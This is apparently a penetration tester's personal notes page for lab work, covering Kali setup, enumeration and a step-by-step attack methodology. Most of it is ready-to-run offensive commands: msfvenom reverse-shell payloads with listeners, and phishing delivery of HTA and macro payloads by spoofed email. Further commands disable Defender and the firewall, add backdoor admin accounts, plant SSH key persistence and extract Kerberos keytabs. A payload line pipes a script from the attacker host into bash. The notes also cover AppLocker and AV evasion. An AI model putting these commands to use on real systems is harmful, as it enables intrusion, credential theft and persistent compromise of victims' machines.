# Hacking # Fresh builds # pimp-my-kali I use this to install all tools like impacket and so on # .zshrc modifications I’ve created several aliases that I utilise throughout my hacking ```bash #custom alias alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' alias diff='diff --color=auto' alias ip='ip --color=auto' alias ss="searchsploit $1" alias l='ls -lAh' alias webup='ls -lah && ip a | grep tun0 && python3 -m http.server 8000' alias rtfm="/opt/rtfm/rtfm.py" alias xclip="xclip -sel c" alias ltr="ls -ltr" alias cdb="echo /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | xclip" alias clearwhite="sed 's/^[ \\t]*//' -i" alias thm="sudo openvpn /home/chevalier/Documents/vpn/thm/Chevalier.opvn" alias htb="sudo openvpn /home/chevalier/Documents/vpn/htb/lab_Chevalier.ovpn" alias update="sudo apt update -y && sudo apt upgrade -y && sudo apt dist-upgrade -y" alias buster="gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 64 -x .txt,.php,.html,.aspx -u" ``` # Structure I keep my VPN settings under `~/Documents/vpn/platform_name/` and all my labs or challenges under `~/labs/platform_name` . # What else? ```bash sudo msfdb init sudo apt install bloodyad sudo apt install terminator pipx install updog3 ``` - Configure bloodhound - Configure ligolo-ng # Browser plugins ```bash Hack-Tools # similar to revshells Wappalyzer # CMS identification User-Agent Switcher # exactly what it says on the tin FoxyProxy # for burpsuite ``` # Cheatsheets # Quick Checklist ### Personal Checklist - \[ \] Enumeration - \[ \] nmap - \[ \] autorecon - \[ \] HTTP/S? - \[ \] gobuster/dirbuster - \[ \] nikto - \[ \] wpscan - \[ \] User - Privesc - \[ \] id - \[ \] lxd - \[ \] sudo -l - \[ \] gtfobins - \[ \] [linpeas.sh](https://github.com/carlospolop/PEASS-ng) - \[ \] SUID/GUID - gtfobins - \[ \] [linenum.sh](http://linenum.sh) - \[ \] SUID/GUID - gtfobins - \[ \] cronjobs - \[ \] Root - \[ \] Profit! **Markdown version** ```markdown # Checklist - [ ] Enumeration - [ ] nmap - [ ] autorecon - [ ] HTTP/S? - [ ] gobuster/dirbuster - [ ] nikto - [ ] wpscan - [ ] User - Privesc - [ ] id - [ ] lxd - [ ] sudo -l - [ ] gtfobins - [ ] [linpeas.sh]() - [ ] SUID/GUID - gtfobins - [ ] linenum.sh - [ ] SUID/GUID - gtfobins - [ ] cronjobs - [ ] Root - [ ] Profit! ``` # Advanced Methodology # 1. Enumeration # Automated approach ```bash autorecon TARGET_IP ``` # Manual approach ```bash nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt ```

If the target is Windows use the below

```bash nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt #or this if you want to dive deeper nmap TARGET_IP -Pn -p- -sV -T 4 -sC -oN output.txt ``` # 2. Initial Access # Phishing # HTA payloads ## Ping ```bash ``` ### TCPdump To catch the ping ```bash sudo tcpdump -i tun0 icmp ``` ## HTA - Bypass CLM 1. Compile the project [https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM) 2. Convert to psby.txt using certutil ```csharp certutil -encode "Z:\\tools\\02.CLM\\revshell\\PSBypassCLM\\PSBypassCLM\\bin\\x64\\Release\\PsBypassCLM.exe" psby.txt ``` 3. Download the psby.txt on the kali host and serve the file with a dropper ```csharp ``` ## HTA - With Meterpreter 1. Generate the shellcode ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f csharp EXITFUNC=thread ``` 2. Run it through [XORme](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/00.encoders/XORme) 3. Update [hollow.xml](https://github.com/blu3drag0nsec/osepvs/blob/main/tools/04.processhollowing/hollow.xml) with the code from above 4. Set up listener ```csharp msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" ``` 5. Deliver it ```csharp ``` # Macro VBA 1. Generate the shellcode ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp ``` 2. Run it through [caesar cypher](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/00.encoders/vba-caesar) - pay attention to `shift` and `key` parameters. 3. Set up listener ```bash msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" ``` 4. Update the [vba](https://4259749503-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIjMGokTUMT5MhpNldrsd%2Fuploads%2Fgit-blob-a682776c87af9345bc612d01077f47198088f48c%2Foffice-vba-macro.txt?alt=media) with your shellcode from step 2. # Sending emails ## swaks ### HTA payloads ```bash swaks --body 'Please check this issue here http://YOUR_IP/payload.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Issues with my account" -t Will@domain.com -f administrator@domain.com --server EMAIL_server ``` ### Macro payloads ```bash swaks --to jobs@domain.com --from administrator@domain.com --header "Subject: My CV" --body "Attached my cv to this email" --attach @cv.docm --server server.domain.tld ``` # 3. Privilege Escalation - Windows # PowerUp 1. Upload the following script to the host `/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1` 2. Load on the target and run it ```powershell . .\\PowerUp.ps1 Invoke-AllChecks ``` 3. Troubleshoot, make sure the service you are trying to abuse is actually started. ### Abusing services ```powershell . .\\PowerUp.ps1 Invoke-AllChecks # if a service is discovered do the things over there -> Invoke-ServiceAbuse -Name 'Service' ``` ```powershell sc query Service sc config Service start=auto sc config Service obj=LocalSystem ``` # 4. Post Compromise 1. Blast AV and enable RDP with hashes ```powershell cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f NetSh Advfirewall set allprofiles state off cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f ``` 1. Sharphound → Bloodhound 2. Dump all hashes and spray 1. SMB 2. winrm 3. ldap 4. wmi # 5. Persistence # Linux - SSH On your host ```bash cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t rsa # copy the content of the file into **authorized_keys** on the target host ``` On the target host ```bash cd ~/.ssh/ ssh-keygen -t rsa # press enter twice cat id_rsa.pub > authorized_keys echo 'YOUR_PUB_KEY' >> authorized_keys ``` # Windows ## Create admin user ```powershell cmd.exe /c net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman ``` or ```powershell net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman ``` ## Enable RDP ```powershell cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f ``` or ```powershell netsh firewall set opmode disable reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f ``` # 6. Pivot

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM.

```powershell sudo apt install ligolo-ng ligolo-ng-common-binaries -y ``` # Basic tunnel 1. start `ligolo-proxy` ```powershell sudo ligolo-proxy -selfcert ``` 1. Connect the agent 2. enter session and list network configuration ```powershell #in ligolo-ng sessions ifconfig ``` 3. set route 1. 1 hop ```powershell autoroute start ``` 2. 2 hops ## AV evasion 1. Clone the repository ```powershell git clone ``` 2. Edit the `ignoreCertificate` and `serverAddr` variables in the following file `/ligolo-ng/cmd/agent/main.go` 3. Compile the `agent.exe` using the following command ```bash GOOS=windows go build -o agent.exe cmd/agent/main.go ``` 4. Compile as `x64` and give the name `ApplockerBypassExternalBinary.exe` - [Github Repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary) 5. Encode the file created above with certutil ```powershell certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt ``` 6. Rename the `agent.exe` to `ligolo-agent.exe` 7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt` 8. Upload the files to the target # Linux AD Tools required ```powershell ``` I usually install them under `/opt/linuxad` You will need to upload them on to the target host. ## Extracting keytab data Most likely you will need to be root to do this ```powershell python KeytabParser.py /etc/krb5.keytab klist -k /etc/krb5.keytab ./keytabextract.py /etc/krb5.keytab ``` # CCACHE ticket ```bash ls /tmp/ | grep krb5cc # usual location ``` To reuse 1. Get a copy of the file on your kali 2. change the permission of the file to 600 using `chmod 600 ` 3. set env variable `export KRB5CCNAME=/location/ticket_name` # Blast Defender # Via command prompt ```bash cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all ``` Just to be safe 🙂 ```powershell REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f NetSh Advfirewall set allprofiles state off ``` # Powershell ```bash Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true ``` # Tools # autorecon # Basic usage ```bash autorecon TARGET_IP ``` Scanning multiple hosts ```bash autorecon -t targets.txt #or the below sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv ``` # nmap ### Base Syntax ```bash nmap {Targets} [ScanType] [Options] ``` ### Target

Purpose	Example
1 target	`nmap IP`
scan multiple targets	`nmap IP1, IP2, IP3`
scan a list	`nmap -iL list.txt`
scan CIDR range	`nmap 192.168.1.0/24`

### Ports

Purpose	Example
Scan top 1k popular ports	`nmap IP`
Port range	`nmap -p x-y`
Port list	`nmap -p x,y,z`
linear portrange	`nmap -r x-y`

### Probing

Purpose	Example
Don't probe	`nmap IP -Pn`
Default probe	`nmap IP -PB`
ICMP Echo Request	`nmap IP -PE`
ICMP Timestamp Request	`nmap IP -PP`
ICMP Network Request	`nmap IP -PM`

### Scan Type

Purpose	Example
Probe only	`nmap IP -sn`
SYN Scan	`nmap IP -sS`
TCP Connect Scan	`nmap IP -sT`
UDP Scan	`nmap IP -su`
Version scan	`nmap IP -sV`
OS Detection	`nmap IP -PM`
Set TCP flags	`nmap IP --scanflags: x,y,z`

### Timing Options

Purpose	Example
Paranoid	`nmap IP -T0`
Sneaky	`nmap IP -T1`
Polite	`nmap IP -T2`
Normal	`nmap IP -T3`
Aggressive	`nmap IP -T4`
Insane	`nmap IP -T5`

### Output Format

Purpose	Example
Standard	`nmap IP -oN file.txt`
Greppable	`nmap IP -oG file.txt`
XML	`nmap IP -oX file.txt`
all formats	`nmap IP -oA file`

### Misc Options

Purpose	Example
Aggresive scan	`nmap IP -A`
nmap reason why a port is in a state	`nmap IP --reason`

# wpscan # Basic usage ```bash wpscan --url http://TARGET_IP ``` Scan for plugins ```bash wpscan --url http://TARGET_IP -e p ``` Scan for users ```bash wpscan --url http://TARGET_IP -e u ``` Scan for vulnerable plugins ```bash wpscan --url http://TARGET_IP -e vp ``` Brute force passwords ```bash wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt ``` # fuff # Basic Usage ```bash ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ ``` # nikto # Basic usage ```bash nikto -host http://TARGET_IP -p PORT ``` # gobuster # Basic usage ```bash gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt ``` Enumerating with extensions (filter the extension based on target) ```bash gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx ``` Enumerating vhosts (after updating `/etc/hosts` ```bash gobuster vhost -u -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --ad ``` # netexec # Enumeration ## SMB ```powershell netexec smb targets.txt -u user_name -H 'NTLM_HASH' ``` ```powershell netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol ``` ## winrm ```powershell netexec winrm targets.txt -u user_name -H 'NTLM_HASH' ``` # powerview ### 1. Enumerate common names ```powershell Get-DomainComputer | select cn ``` # msf # Linux payloads ## With commands ```powershell msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf ``` # Windows ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.c ``` Catch with ```bash msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" ``` # rubeus ```powershell Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt ``` # powersploit Reset a user’s password ```powershell $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword ``` # mimikatz You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: ## meterpreter ```bash upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys ``` ## powershell ```powershell powershell -ep bypass -c iwr YOUR_IP/mimikatz.exe -o .\\mimikatz.exe powershell -ep bypass -c iwr YOUR_IP/mimidrv.sys -o .\\mimidrv.sys ``` # ligolo-ng

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM.